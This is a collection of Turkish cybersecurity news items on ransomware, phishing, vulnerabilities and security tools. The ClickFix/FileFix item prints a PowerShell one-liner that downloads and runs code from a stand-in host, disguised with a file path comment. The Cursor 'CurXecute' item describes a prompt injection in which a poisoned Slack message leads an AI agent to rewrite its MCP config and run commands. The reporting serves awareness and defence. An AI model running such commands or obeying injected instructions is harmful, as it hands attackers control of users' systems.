Alone teması, Envato pazarında yaklaşık 10 bin satışa sahip olup, özellikle yardım kuruluşları, sivil toplum örgütleri ve bağış platformları tarafından tercih ediliyor.

Geçen ay, Motors adlı başka bir popüler WordPress temasında da kullanıcı doğrulama açığı kullanılarak site yöneticisi hesapları ele geçirilmişti.

Uzmanlar, WordPress kullanıcılarını temaların yanı sıra eklenti ve çekirdek bileşenleri düzenli olarak güncellemeleri konusunda uyarıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

SafePay adlı fidye yazılımı grubu, küresel bilgi teknolojileri distribütörü Ingram Micro’nun sistemlerinden ele geçirildiği iddia edilen 3,5 terabaytlık veriyi sızdırma tehdidinde bulundu. Grup, şirket verilerini karanlık ağdaki sızıntı portalında yayımlamayı planladığını açıkladı.

Ingram Micro; donanım, yazılım, bulut hizmetleri, lojistik ve eğitim alanlarında dünya çapında bayilere ve yönetilen hizmet sağlayıcılarına çözümler sunan çok uluslu bir teknoloji şirketidir.

Olayın Gelişimi

İlk bildirim 5 Temmuz’da yapılmış, SafePay grubunun saldırının arkasında olduğu bilgisi paylaşılmıştı. Ancak saldırı grubu, taahhüdünü resmi olarak bu hafta başında doğruladı.

SafePay, kurban sistemleri şifrelemeden önce hassas verileri ele geçirip ödeme alınmadığı takdirde bunları yayımlamakla bilinen bir fidye grubu. 2024 Eylül’den beri 260’tan fazla kurbanı karanlık ağda listeliyor.

Etkiler ve Şirketin Yanıtı

Saldırı, Ingram Micro’nun küresel operasyonlarında kesintilere neden oldu. İnternet sitesi ve sipariş sistemleri kapandı, çalışanlara evden çalışma talimatı verildi.

Şirket, VPN erişimini yeniden sağlamak için çalıştı, parola ve çok faktörlü kimlik doğrulama (MFA) sistemlerini kapsamlı şekilde sıfırladı. Dört gün içinde tüm bölgelerdeki faaliyetler yeniden başlatıldı.

Ancak Ingram Micro, SafePay’in saldırıdan sorumlu olup olmadığı veya verilerin gerçekten sızdırılıp sızdırılmadığı konusunda henüz resmi açıklama yapmadı.

Basın kuruluşları, şirketten konuyla ilgili bilgi almakta zorlanıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Siber güvenlik yarışması Pwn2Own, 2025 İrlanda ayağında kullanıcı etkileşimi olmadan çalışan (zero-click) bir WhatsApp güvenlik açığı keşfeden araştırmacıya 1 milyon dolar ödül verileceğini duyurdu.

Etkinliği organize eden Zero Day Initiative (ZDI), WhatsApp’ın dünya genelinde 3 milyardan fazla kullanıcıya sahip olduğunu ve böyle bir açığın kritik öneme sahip olduğunu belirtti. Bu açık sayesinde hedef cihaza kullanıcı herhangi bir işlem yapmadan zararlı kod yüklenebiliyor.

Etkinlik Detayları ve Kategoriler

Pwn2Own Ireland 2025, 21-24 Ekim tarihleri arasında İrlanda’nın Cork kentinde düzenlenecek. Yarışmanın sponsorları arasında Meta, Synology ve QNAP bulunuyor. Meta, WhatsApp açıklarına özel ilgi göstererek bu kategori için rekor ödül seviyesini belirledi.

Yarışmada yalnızca WhatsApp değil, akıllı telefonlar, mesajlaşma uygulamaları, ev ağı ekipmanları, giyilebilir cihazlar, akıllı gözlükler ve yazıcılar gibi sekiz farklı kategoriye yönelik saldırı senaryoları değerlendirilecek.

Bu yıl mobil cihaz kategorisi için saldırı yüzeyi genişletildi. Yarışmacılar USB bağlantısı yoluyla fiziksel olarak kilitli telefonlara da sızmayı deneyebilecek. Wi-Fi, Bluetooth ve NFC gibi kablosuz protokoller saldırı yöntemleri arasında yer almaya devam ediyor.

Başvuru ve Ödül Süreci

Kayıtlar 16 Ekim 2025, saat 17:00'ye kadar alınacak ve yarışma sıralaması kura ile belirlenecek. ZDI’nın amacı, güvenlik açıklarının kötü niyetlilerden önce tespit edilerek üretici firmalarla iş birliği içinde kapatılmasıdır.

Tespit edilen açıklar firmalara bildirilecek, 90 gün içinde yamalanmazsa kamuoyuna açıklanabilecek.

Geçmişten Notlar

2024 Pwn2Own Ireland etkinliğinde 70'ten fazla sıfır gün açığı keşfedildi ve toplamda 1 milyon doların üzerinde ödül dağıtıldı. Örneğin Viettel Cyber Security ekibi, QNAP NAS, Sonos hoparlör ve Lexmark yazıcı açıkları ile 205 bin dolar kazandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yapay zekâ destekli kod editörü Cursor'da tespit edilen yeni bir güvenlik açığı, sistemde geliştirici ayrıcalıklarıyla uzaktan komut çalıştırılmasına olanak tanıyor. Araştırma şirketi Aim Security tarafından "CurXecute" adı verilen bu zafiyet, CVE-2025-54135 olarak kayda geçti.

Cursor IDE, Model Context Protocol (MCP) adlı açık standart sayesinde yapay zekâ ajanlarının harici kaynaklarla bağlantı kurup işlevsel olmasını sağlıyor. Ancak MCP yapısı, ajanın kontrol akışının kötü niyetli girdilerle manipüle edilmesine zemin hazırlıyor.

Zararlı Prompt Dosyası Yazdırabiliyor

CurXecute açığından faydalanan saldırganlar, ajana dış kaynaktan gönderilen zararlı komut dizileriyle ~/.cursor/mcp.json dosyasını yeniden yazabiliyor. Kullanıcının bilgisi olmadan bu dosya diske kaydediliyor ve böylece uzaktan komut çalıştırma mümkün hale geliyor.

Aim Security’ye göre dosya değişiklikleri kullanıcı tarafından reddedilse bile etkisi sürüyor; bu da kullanıcı etkileşimi olmadan saldırıların başarıyla yürütülebilmesine sebep oluyor.

Örneğin, MCP destekli Slack sunucularına zararlı bir prompt yerleştirilip, geliştiricinin bu mesajları özetlemesi için ajan kullanılması halinde kötü amaçlı betikler çalıştırılabiliyor.

“Zehirli tek bir belge, yerel yapay zekâ ajanını sistem kabuğuna dönüştürebilir.” — Aim Security

Yama ve Tavsiyeler

CurXecute açığı 7 Temmuz 2025’te Cursor geliştirici ekibine bildirildi, ertesi gün yazılım ana dalına yama eklendi. 29 Temmuz’da yayımlanan Cursor 1.3 sürümü bu açığı kapatan güncellemeleri içeriyor.

Cursor ekibi, CVE-2025-54135 için yayınladığı güvenlik danışma metninde, kullanıcıların mümkün olan en kısa sürede güncellemeye geçmelerini ve eski sürümleri kullanmamalarını öneriyor. Açık, 8.6 skorla “orta seviye kritik” olarak derecelendirildi.

Araştırmacılar, bu açığın fidye yazılım saldırıları, veri sızıntıları, yapay zekâ bazlı yanlış yönlendirmeler (hallusinasyonlar) ve proje bütünlüğünü tehdit eden sızıntı tabanlı saldırılara yol açabileceği konusunda uyarıda bulunuyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Popüler reklam engelleme çözümü Pi-hole, WordPress bağış eklentisi GiveWP’de tespit edilen kritik bir güvenlik açığı nedeniyle kullanıcı verilerinin sızdırıldığını duyurdu.

Kuruluş, 28 Temmuz Pazartesi günü bağışçılardan gelen şüpheli e-posta bildirimleri üzerine durumu fark etti. Yapılan teknik inceleme, GiveWP eklentisinin bir açığından dolayı bağış yapan kullanıcıların isim ve e-posta adreslerinin, herhangi bir kimlik doğrulama olmaksızın sayfanın kaynak kodunu görüntüleyen herkes tarafından erişilebilir olduğunu ortaya koydu.

Veri ihlali yalnızca bağış formu üzerinden destek veren kullanıcıları etkilerken, Pi-hole’un kendi yazılımı bu olaydan etkilenmedi.

Yaklaşık 30 Bin Bağışçı Etkilendi

1 Ağustos Cuma yayımlanan analizde, veri ihlali bildirim servisi Have I Been Pwned yaklaşık 30 bin bağışçının etkilendiğini belirtti. Sızan kayıtların %73’ü, daha önce başka ihlallerde de ifşa olmuş kullanıcı bilgilerini içeriyor.

Pi-hole, finansal bilgilerin Stripe ve PayPal tarafından işlendiğini, bu nedenle kredi kartı veya ödeme detaylarının sızdırılmadığını vurguladı.

Bağış formunda kullanıcıların geçerli isim veya e-posta girmesi zorunlu olmasa da, tüm bağışçı bilgilerine internet üzerinden erişilebilmesinden dolayı Pi-hole özür diledi.

Gecikmeli Bilgilendirme ve Eleştiriler

GiveWP geliştirici ekibi, açığı GitHub’da rapor edilmesinden birkaç saat sonra gidererek 4.6.1 sürümünü yayımladı. Ancak Pi-hole, geliştiricinin kullanıcı bilgilendirmede geciktiğini ve olayın ciddiyetini yeterince önemsemediğini savundu.

Pi-hole açıklamasında, “Kullandığımız yazılımların sorumluluğu bize aittir. Yaygın kullanılan bir eklentiye güven duyduk ve bu güven boşa çıktı. Etkilenen tüm bağışçılardan özür dileriz.” ifadesi yer aldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Siber güvenlik şirketi Arctic Wolf'un açıklamasına göre, Temmuz ayının ikinci yarısından itibaren SonicWall güvenlik duvarı cihazları Akira fidye yazılımı saldırılarında hedef alınmaya başladı. Saldırganların, henüz doğrulanmamış olmakla birlikte, daha önce bilinmeyen bir güvenlik açığını kullanıyor olabileceği değerlendiriliyor.

Akira fidye yazılımı Mart 2023'te ortaya çıktı ve kısa sürede dünya genelinde çok sayıda sektörü hedef aldı. Bugüne kadar 300’den fazla kurumu karanlık ağ sızıntı portalına ekleyen grup; Nissan, Hitachi ve Stanford Üniversitesi gibi yüksek profilli kuruluşlara yönelik saldırılarla dikkat çekti. FBI verilerine göre, Akira grubu Nisan 2024 itibarıyla 250'den fazla kurbanından toplamda 42 milyon doların üzerinde fidye topladı.

Arctic Wolf Labs araştırmacıları, saldırıların çoğunun SonicWall SSL VPN bağlantıları üzerinden yetkisiz erişim yoluyla gerçekleştiğini, ilk sızmanın 15 Temmuz'da gözlendiğini açıkladı. Henüz erişim yöntemi kesinleşmemekle birlikte, bir sıfırıncı gün açığı olasılığı güçlü şekilde değerlendiriliyor. Ancak brute force, sözlük saldırıları veya kimlik bilgisi dolandırıcılığı gibi yöntemlerin de tamamen dışlanmadığı belirtildi.

Uzun Süreli ve Hedefli Kampanya

Saldırganlar, VPN üzerinden sağlanan ağ erişimini çok kısa sürede veri şifreleme aşamasına taşıyor. Bu durum, Ekim 2024’ten bu yana tespit edilen benzer saldırı örüntüleriyle örtüşüyor ve SonicWall cihazlarına yönelik süregelen ve organize bir kampanyaya işaret ediyor.

VPN bağlantılarında genellikle geniş bant internet servis sağlayıcıları kullanılırken, bu saldırılarda sanal özel sunucu (VPS) tabanlı VPN kimlik doğrulama hizmetlerinin tercih edildiği tespit edildi. Bu detay, saldırıların sistematik biçimde yürütüldüğünü ortaya koyuyor.

Arctic Wolf’un Tavsiyeleri ve Güvenlik Önlemleri

Arctic Wolf, SonicWall cihazlarında potansiyel bir sıfırıncı gün açığının aktif olarak istismar ediliyor olabileceği ihtimaline karşı, yöneticilere SSL VPN hizmetlerini geçici olarak devre dışı bırakmalarını tavsiye etti. Ayrıca detaylı günlük kaydı alma, uç nokta izleme ve VPS tabanlı VPN oturumlarının engellenmesi gibi ek güvenlik önlemlerinin devreye alınması gerektiği bildirildi.

SMA 100 Cihazları İçin Güncelleme Uyarısı

Saldırılara ilişkin Arctic Wolf raporu, SonicWall’un müşterilerini SMA 100 cihazlarındaki kritik bir güvenlik açığı (CVE-2025-40599) hakkında uyarmasından bir hafta sonra yayımlandı. SonicWall, söz konusu açığın kötüye kullanılabilmesi için yönetici ayrıcalığı gerektiğini ve şu anda aktif bir sömürü izine rastlanmadığını belirtti. Ancak yine de tüm kullanıcıların sistemlerini güncellemeleri istendi.

Google Threat Intelligence Group (GTIG) tarafından yayımlanan bir başka raporda, saldırganların yetkisiz erişim elde ettikten sonra OVERSTEP adlı yeni bir rootkit zararlı yazılım yüklediği belirtildi.

SonicWall, sanal veya fiziksel SMA 100 cihazı kullanan tüm müşterilere, GTIG tarafından paylaşılan bulgu göstergeleri (IoC) doğrultusunda sistem günlüklerini incelemeleri ve şüpheli faaliyet durumunda destek ekipleriyle irtibata geçmeleri çağrısında bulundu.

Not: SonicWall tarafından konuya ilişkin henüz resmi bir açıklama yapılmamıştır.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Python topluluğunun resmi paket deposu olan PyPI (Python Package Index), bu hafta kullanıcılarını sahte bir web sitesi üzerinden yürütülen kimlik avı saldırısına karşı uyardı. Saldırganlar, PyPI geliştiricilerine "[PyPI] Email verification" başlıklı ve noreply@pypj.org adresinden gönderilen e-postalarla ulaşıyor.

PyPI yöneticisi Mike Fiedler tarafından yapılan açıklamada, “Bu durum PyPI platformunun güvenliğini ihlal eden bir saldırı değil, kullanıcı güvenini istismar eden bir kimlik avı girişimidir. Kullanıcılardan e-postalarını doğrulamaları isteniyor ve sahte bir siteye yönlendiriliyorlar.” ifadeleri kullanıldı.

Söz konusu sahte site, resmi PyPI platformuna görsel olarak benzeyecek şekilde tasarlanmış ve kullanıcıları oturum açmaya yönlendiriyor. Ancak bu giriş bilgilerinin gerçek PyPI’ye iletilmesi yerine saldırganlar tarafından toplandığı belirtiliyor.

Hedef: Hesap Ele Geçirme ve Zararlı Paket Yükleme

Saldırganların amacı, geliştiricilere ait PyPI hesaplarını ele geçirerek daha önce yayımlanmış Python paketlerine kötü amaçlı kod enjekte etmek veya yeni zararlı paketler yüklemek. Bu tür saldırılar, açık kaynak yazılım ekosisteminde geniş çaplı güvenlik tehditlerine yol açabiliyor.

PyPI Platformu Önlem Aldı

PyPI yöneticileri, sitenin ana sayfasına bir uyarı bandı ekleyerek kullanıcıları aktif olarak bilgilendirmeye başladı. Ayrıca, alan adı sağlayıcıları ve CDN firmalarına marka ihlali ve kötüye kullanım bildirimleri gönderildiği belirtildi.

Kullanıcılardan şu önlemleri almaları istendi:

• noreply@pypj.org adresinden gelen e-postalara tıklamadan silinmesi,
• Daha önce bu sahte sitede kullanıcı bilgisi girildiyse, şifrelerinin derhal değiştirilmesi,
• Hesaplarının Security History bölümü üzerinden şüpheli etkinliklerin kontrol edilmesi.

Daha Önce de Saldırılar Yaşanmıştı

Python Software Foundation, geçtiğimiz yıl yüzlerce zararlı paketin yüklenmesiyle sonuçlanan bir kampanya nedeniyle geçici olarak yeni kullanıcı kaydı ve proje oluşturma işlemlerini durdurmak zorunda kalmıştı. Ayrıca Şubat 2025’te başlatılan Project Archival sistemiyle, artık güncelleme almayacak projelerin arşivlenmesi kolaylaştırılmıştı.

Uzmanlar, açık kaynak topluluklarında yer alan geliştiricilerin e-posta adreslerini içeren meta verilerinin saldırganlar için değerli bir kaynak olduğunu ve bu verilerin kimlik avı kampanyalarında kullanılabileceğini hatırlatıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Siber güvenlik kaynaklarına göre, ShinyHunters olarak bilinen siber suç grubu, Qantas, Allianz Life, LVMH ve Adidas gibi önde gelen firmaları hedef alan geniş kapsamlı veri hırsızlığı saldırılarının arkasında yer alıyor. Söz konusu saldırılar, şirketlerin kullandığı Salesforce CRM platformlarına yönelik sosyal mühendislik yöntemleriyle gerçekleştirildi.

Google’ın Tehdit İstihbarat Grubu (GTIG), Haziran 2025'te bu tür saldırıların arttığını ve saldırganların UNC6040 olarak izlendiğini bildirmişti. Bu kapsamda, saldırganlar BT destek personeli gibi davranarak kurbanları telefonla aradı ve onları Salesforce'un bağlı uygulama kurulumu sayfasına yönlendirdi. Kullanıcılardan sahte "bağlantı kodları" girilmesi istendi. Böylece, kötü amaçlı olarak kurgulanmış Data Loader uygulaması kurbanın hesabına bağlanabildi.

Bazı saldırılarda, bu uygulama “My Ticket Portal” adıyla yeniden adlandırılarak daha inandırıcı hale getirildi. Kimlik avı sürecinde ayrıca sahte Okta giriş sayfaları da kullanılarak kullanıcıların kimlik bilgileri ve çok faktörlü kimlik doğrulama (MFA) token'ları da ele geçirildi.

Hedef Olan Şirketler

• LVMH bünyesindeki Louis Vuitton, Dior ve Tiffany & Co., müşteri veritabanlarına yetkisiz erişim sağlandığını doğruladı.
• Allianz Life, 16 Temmuz 2025’te üçüncü taraf bir bulut tabanlı CRM sistemi üzerinden erişim sağlandığını açıkladı.
• Qantas, olayın Salesforce ile ilgili olduğunu doğrulamazken, yerel medya verilerin Salesforce sistemi üzerinden çalındığını bildirdi.
• Adidas da benzer bir CRM saldırısından etkilendiğini duyurdu.

Adli belgeler, saldırıların özellikle Salesforce’un "Accounts" ve "Contacts" tablolarına odaklandığını ortaya koyuyor. Tüm saldırılar aynı kampanyaya işaret ederken, şirketlere gönderilen özel e-postalarda kendilerini "ShinyHunters" olarak tanıtan tehdit aktörlerinin şirketleri özel olarak şantaj yoluyla hedef aldığı belirtildi.

Grup Yapısı ve Saldırı Yöntemleri

ShinyHunters grubu, daha önce Snowflake veri sızıntısı, AT&T, Oracle Cloud, PowerSchool gibi büyük ölçekli olaylarla gündeme gelmişti. Grup, genellikle şirket ağlarına tam erişim sağlamak yerine veri çalımı ve özel şantaj yöntemlerine odaklanıyor.

Bazı güvenlik araştırmacıları, ShinyHunters’ın zaman zaman Scattered Spider olarak bilinen ve daha agresif yöntemler kullanan başka bir grupla örtüşen üyelik yapısına sahip olduğunu düşünüyor. Her iki grubun da Lapsus$ adlı eski hacker kolektifiyle bağlantılı olabileceği iddia ediliyor.

Ayrıca, ShinyHunters’ın bazı durumlarda doğrudan saldırıyı gerçekleştirmeyip, üçüncü tarafların çaldığı verileri komisyon karşılığında pazarlayan bir “extortion-as-a-service” (şantaj hizmeti) grubu olarak faaliyet gösterdiği de öne sürülüyor.

Salesforce: Platform Değil, Kullanıcılar Hedef Alınıyor

Salesforce, yapılan açıklamada sistemlerinde herhangi bir zafiyet olmadığını ve saldırıların tamamen kullanıcılara yönelik sosyal mühendislik yöntemleriyle gerçekleştiğini belirtti.

Şirket, kullanıcıların aşağıdaki güvenlik önlemlerini uygulamasını öneriyor:

• Güvenilen IP aralıklarını zorunlu hale getirme
• En az yetki ilkesine uygun yetkilendirme
• Çok faktörlü kimlik doğrulama (MFA) kullanımı
• Bağlı uygulamalara erişimi sınırlandırma
• Salesforce Shield ile gelişmiş izleme ve olay politikaları kullanımı
• Güvenlik olayları için belirli bir güvenlik iletişim kişisi tanımlama

Kaynak: CUMHA - CUMHUR HABER AJANSI

Gizlilik odaklı hizmetleriyle tanınan İsviçre merkezli teknoloji şirketi Proton, yeni Proton Authenticator uygulamasını yayımladığını duyurdu. Uygulama, Windows, macOS, Linux, Android ve iOS platformlarında çalışıyor ve tamamen ücretsiz olarak indirilebiliyor.

Proton Authenticator, çevrimdışı çalışan ve her 30 saniyede bir yenilenen zaman tabanlı tek kullanımlık şifreler (TOTP) üreterek kullanıcıların çevrimiçi hesaplarını daha güvenli hale getiriyor. Bu kodlar, parolaların yanı sıra ikinci bir doğrulama katmanı olarak kullanılıyor.

Uygulama, reklam içermiyor, kullanıcı takibi yapmıyor ve Proton hesabı gerektirmeden kullanılabiliyor. Bu yönüyle Google Authenticator, Microsoft Authenticator ve Authy gibi yaygın uygulamalardan ayrılıyor. Proton yetkilileri, “Bu uygulama, gizlilik, şeffaflık ve kullanıcı odaklı güvenlik ilkeleriyle geliştirildi” açıklamasında bulundu.

Proton Authenticator’ın Öne Çıkan Özellikleri

• Tamamen çevrimdışı çalışabilen zaman tabanlı doğrulama kodları,
• Uçtan uca şifreli çoklu cihaz senkronizasyonu,
• Diğer platformlara geçişi kolaylaştıran içe/dışa aktarma özelliği,
• Biyometrik ya da PIN ile uygulama kilitleme,
• Otomatik şifreli yedekleme sistemi,
• Kullanıcı verilerinin hiçbir Proton sunucusuna gönderilmemesi,
• Yakında yayımlanması planlanan açık kaynak kod yapısı.

Ayrıca Proton Authenticator, pek çok popüler uygulamada olmayan bir özellikle geliyor: TOTP anahtarlarının dışa aktarılabilmesi, yani kullanıcıların tüm hesaplarını başka bir cihaza veya uygulamaya taşırken veri kaybı yaşamaması mümkün hale geliyor.

Bu tür uygulamalar, SMS veya e-posta üzerinden gönderilen doğrulama kodlarına göre çok daha güvenli kabul ediliyor. Çünkü kodlar yerel olarak üretiliyor, kısa sürede geçersiz hale geliyor ve phishing, SIM değişimi veya ortadaki adam (MITM) saldırılarına karşı dayanıklı bir yapı sunuyor.

Proton, bu yeni uygulamasıyla kullanıcıları büyük teknoloji şirketlerinin kapalı ve takip temelli ekosistemlerinden kurtarmayı hedeflediğini belirtti. Kaynak kodunun önümüzdeki haftalarda Proton’un GitHub hesabında yayımlanması bekleniyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Siber tehdit istihbarat firması GreyNoise, 2024 yılından bu yana topladığı verilerle gerçekleştirdiği analizde, güvenlik açıkları kamuya duyurulmadan önce geçen altı haftalık sürede ağ trafiğinde olağan dışı bir artış olduğunu tespit etti. Şirketin verilerine göre, incelenen olayların %80’inde, CVE (Common Vulnerabilities and Exposures) açıklamaları öncesinde saldırgan faaliyetlerinde ani sıçramalar yaşanıyor.

Araştırmada kullanılan veriler, GreyNoise’un küresel tarama verileri sağlayan Global Observation Grid (GOG) platformundan elde edildi. İstatistiksel güvenilirlik sağlamak adına düşük kaliteli ve gürültülü veriler analiz dışı bırakıldı ve toplam 216 anormal trafik olayı değerlendirmeye alındı. Bu olaylar, aralarında Ivanti, SonicWall, Palo Alto Networks, Fortinet, MikroTik, Citrix ve Cisco gibi sekiz büyük uç ağ cihazı üreticisini kapsıyor.

GreyNoise, “İncelediğimiz 216 trafik artışının %50’si üç hafta içinde, %80’i ise altı hafta içinde yeni bir güvenlik açığı duyurusu ile sonuçlandı.” açıklamasında bulundu.

Eski Açıklar Taranıyor, Yeni Saldırılar Hazırlanıyor

Araştırmacılara göre bu trafik artışları genellikle daha önce bilinen açıklara yönelik taramalardan oluşuyor. Ancak bu taramaların amacı sadece bu eski açıkları sömürmek değil, aynı zamanda yeni zafiyetlerin keşfi ya da ağa açık sistemlerin haritalanması gibi sonraki aşamalar için zemin hazırlamak.

Savunma İçin Erken Uyarı Mekanizması

GreyNoise, bu tür trafik artışlarının savunma ekipleri için bir tür “erken uyarı” niteliği taşıdığını belirtiyor. Bu sayede, bir güvenlik yaması yayınlanmamış olsa dahi sistem yöneticileri önceden hazırlık yapabiliyor, izleme sistemlerini güçlendirebiliyor ve riskli IP’leri kara listeye alabiliyor.

Özellikle devlet destekli tehdit gruplarının, uç nokta cihazlarını ilk erişim ve kalıcılık amacıyla hedef aldığı biliniyor. Bu da ağ üzerindeki anormal hareketliliklerin göz ardı edilmemesi gerektiğini gösteriyor.

Google Project Zero’dan Paralel Adım

Bu gelişmeyle eş zamanlı olarak, Google’ın Project Zero ekibi de önemli bir politika değişikliğini duyurdu. Buna göre yeni bir güvenlik açığı tespit edildiğinde, artık teknik detay verilmeden yalnızca hangi ürünün etkilendiği, ne zaman keşfedildiği ve açıklama süresi gibi temel bilgiler bir hafta içinde kamuoyuyla paylaşılacak. Amaç, yazılım tedarikçileri güncelleme hazırlarken sistem yöneticilerinin savunmasını hızla güçlendirebilmesini sağlamak.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Siber güvenlik platformu Keep Aware tarafından yayımlanan yeni bir analiz, ClickFix olarak adlandırılan tarayıcı kaynaklı sosyal mühendislik saldırısının detaylarını ortaya koydu. Bu saldırılar, kullanıcıların farkında olmadan tarayıcıdan panoya kopyalanan zararlı kodları çalıştırmalarına neden olarak sistemin ele geçirilmesine zemin hazırlıyor.

Sessiz Tehdit: ClickFix Nedir

ClickFix saldırıları, genellikle sahte CAPTCHA doğrulamaları gibi kullanıcıdan "bir şeyi düzeltmesi" istenen görseller üzerinden başlatılıyor. Kullanıcı bir öğeye tıkladığında, tarayıcı sessizce panoya zararlı PowerShell komutları kopyalıyor. Ardından kullanıcıya bu kodu terminale yapıştırması gerektiği söyleniyor. Bu işlem, kötü amaçlı yazılımın çalıştırılmasına neden oluyor.

Keep Aware tarafından paylaşılan gerçek bir vaka analizinde, bir kullanıcı arama motoru sonuçlarında karşılaştığı bir siteye tıkladıktan sonra ClickFix saldırısına maruz kaldı. Sayfa, panoya NetSupport Manager uzaktan erişim truva atı içeren PowerShell kodunu kopyaladı ve çalıştırılması yönünde kullanıcıyı yönlendirdi. Keep Aware’ın tarayıcı güvenlik çözümleri sayesinde saldırı gerçekleşmeden engellendi.

Yeni Varyant: FileFix

Haziran 2025'te araştırmacı mr.d0x tarafından belgelenen FileFix, ClickFix’in gelişmiş bir versiyonu olarak ortaya çıktı. FileFix’te kullanıcı, panoya gizlenmiş PowerShell komutlarını doğrudan Windows Dosya Gezgini'nin adres çubuğuna yapıştırmaya ikna ediliyor. Komutun ardından gelen dosya yolu yorum satırı olarak ekleniyor ve tehdit gizleniyor:

Powershell.exe -c "iwr malicious[.]site/mal.jpg|iex" # C:\Organization\Internal\Drive\Business-RFP.pdf
  

Bu tür saldırılarda, kullanıcının zararlı kodu fark etmesi zorlaşıyor çünkü adres çubuğu yalnızca dosya yolu kısmını gösteriyor.

Kalıcı Tehdit: RAT ve Stealer Yüklemeleri

ClickFix ve FileFix saldırıları, kullanıcıyı aktif olarak kodu çalıştırmaya yönlendirerek AsyncRAT, Lumma Stealer, DarkGate, DanaBot gibi kötü amaçlı yazılımların sisteme yerleşmesini sağlıyor. Panoya kopyalanan kod, indirilen dosyaları açıyor, çözümleyerek sistemde kalıcılık sağlayan arka kapılar kuruyor.

Koruma Nereden Başlamalı

Uzmanlara göre bu tür saldırılar, klasik antivirüs ve güvenlik duvarı çözümlerini aşabiliyor. Bu nedenle tarayıcı düzeyinde, panoya erişimi izleyen ve zararlı komutları gerçek zamanlı engelleyen çözümler kullanılmalı. Keep Aware, ClickFix ve FileFix saldırılarını tarayıcıda tespit ederek henüz çalıştırılmadan durdurabildiğini belirtiyor.

Tarayıcı Güvenliği Öncelik Haline Geliyor

Keep Aware, bu saldırıların güvenlik stratejilerindeki en büyük açık olan tarayıcı alanını hedef aldığını vurguluyor. Şirket, bu nedenle tarayıcı merkezli güvenlik yaklaşımı geliştirdiklerini ve Black Hat USA 2025 etkinliğinde sunum yapacak dört Startup Spotlight finalistinden biri seçildiklerini açıkladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Microsoft, Rusya merkezli siber casusluk grubu Secret Blizzard’ın, Moskova’daki diplomatik temsilcilikleri hedef alan yeni bir siber kampanya yürüttüğünü açıkladı. Grup, yerel internet servis sağlayıcılarının altyapısını kullanarak adversary-in-the-middle (AiTM) saldırıları gerçekleştiriyor.

Microsoft’un daha önce Turla, Waterbug ve Venomous Bear gibi adlarla da takip ettiği bu grup, hedef kullanıcıları sahte Kaspersky antivirüs yükleyicisiyle kandırarak ApolloShadow adlı özel zararlı yazılımı sistemlere yerleştiriyor. Saldırının temel yöntemi, kurbanları captive portal’lara yönlendirmek ve buradan kötü amaçlı dosyaları indirmeye zorlamak.

ApolloShadow sistemlere yüklendikten sonra, sahte bir Kaspersky root sertifikası da kuruyor. Bu sertifika, saldırganların zararlı siteleri meşru gibi göstermesini sağlıyor ve sistemde kalıcı erişim elde etmelerine imkân tanıyor.

Microsoft, “Bu, Secret Blizzard grubunun ISP düzeyinde istihbarat toplama yeteneğini ilk kez doğruladığımız bir örnektir. Rusya’daki yerel internet sağlayıcılarını kullanan diplomatik personel, yüksek risk altındadır.” açıklamasında bulundu.

Saldırı zincirinin Şubat 2025'te tespit edildiği, ancak kampanyanın en azından 2024’ten bu yana aktif olduğu belirtiliyor. Microsoft ayrıca, saldırganların Rusya’daki resmi gözetim altyapısı SORM (System for Operative Investigative Activities) üzerinden AiTM saldırılarını yaygınlaştırdığını belirtti.

Yüksek Profilli Hedeflere Yönelik Sıra Dışı Taktikler

Secret Blizzard, 1996'dan bu yana dünya genelinde 100'den fazla ülkede elçilikleri, devlet kurumlarını ve araştırma merkezlerini hedef alan siber casusluk faaliyetleri yürütüyor. Grup, iki yıl önce ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA) tarafından FSB’nin 16. Merkezi ile ilişkilendirilmişti.

Geçmişte, Britney Spears’ın Instagram gönderilerine yazılan yorumlar üzerinden kötü amaçlı yazılımları kontrol ettikleri ve İranlı APT grubu OilRig'in altyapısını kullanarak saldırılarını gizlemeye çalıştıkları tespit edilmişti. Ayrıca, yakın zamanda Pakistanlı Storm-0156 grubunun altyapısını ele geçirerek Ukrayna askeri cihazlarını Starlink bağlantıları üzerinden hedef aldıkları bildirildi.

Secret Blizzard grubunun, ABD Merkez Kuvvetler Komutanlığı (CENTCOM), NASA, Pentagon, Finlandiya Dışişleri Bakanlığı, AB devletleri ve büyükelçiliklerini de hedef aldığı biliniyor.

Microsoft, özellikle diplomatik kurumlar ve yerel ağ altyapısına bağlı çalışan tüm kuruluşlar için ciddi güvenlik önlemleri alınması gerektiğini vurguladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), kötü amaçlı yazılım ve dijital adli analiz süreçlerini otomatikleştirmeye yönelik geliştirilen Thorium platformunun açık kaynak olarak yayınlandığını duyurdu. Thorium, kamu, özel sektör ve devlet kurumlarındaki siber güvenlik uzmanlarına yönelik olarak geliştirildi.

Thorium, CISA ile Sandia Ulusal Laboratuvarları iş birliğiyle geliştirildi ve saniyede 1.700'den fazla işlem planlayabilme ve saatlik 10 milyon dosya işleyebilme kapasitesine sahip. Bu altyapı, analiz süreçlerinde yüksek ölçeklenebilirlik ve hız sunuyor.

CISA açıklamasında, “Thorium, ticari, açık kaynaklı ve kuruma özel analiz araçlarını entegre ederek analiz iş akışlarını otomatikleştiriyor. Yazılım analizi, dijital adli inceleme ve olay müdahalesi gibi görevlerde güvenlik ekiplerine kapsamlı destek sağlıyor.” ifadelerine yer verildi.

Thorium’un Temel Özellikleri:

• Açık kaynak, ticari veya özel komut satırı araçlarının Docker görüntüleri olarak kolayca entegre edilmesi
• Araç ve sonuç paylaşımını kolaylaştıran içe/dışa aktarma özellikleri
• Etiketleme ve tam metin aramayla sonuç filtreleme
• Erişim kontrolleri için grup tabanlı yetkilendirme
• Kubernetes ve ScyllaDB entegrasyonu ile ölçeklenebilir yapı

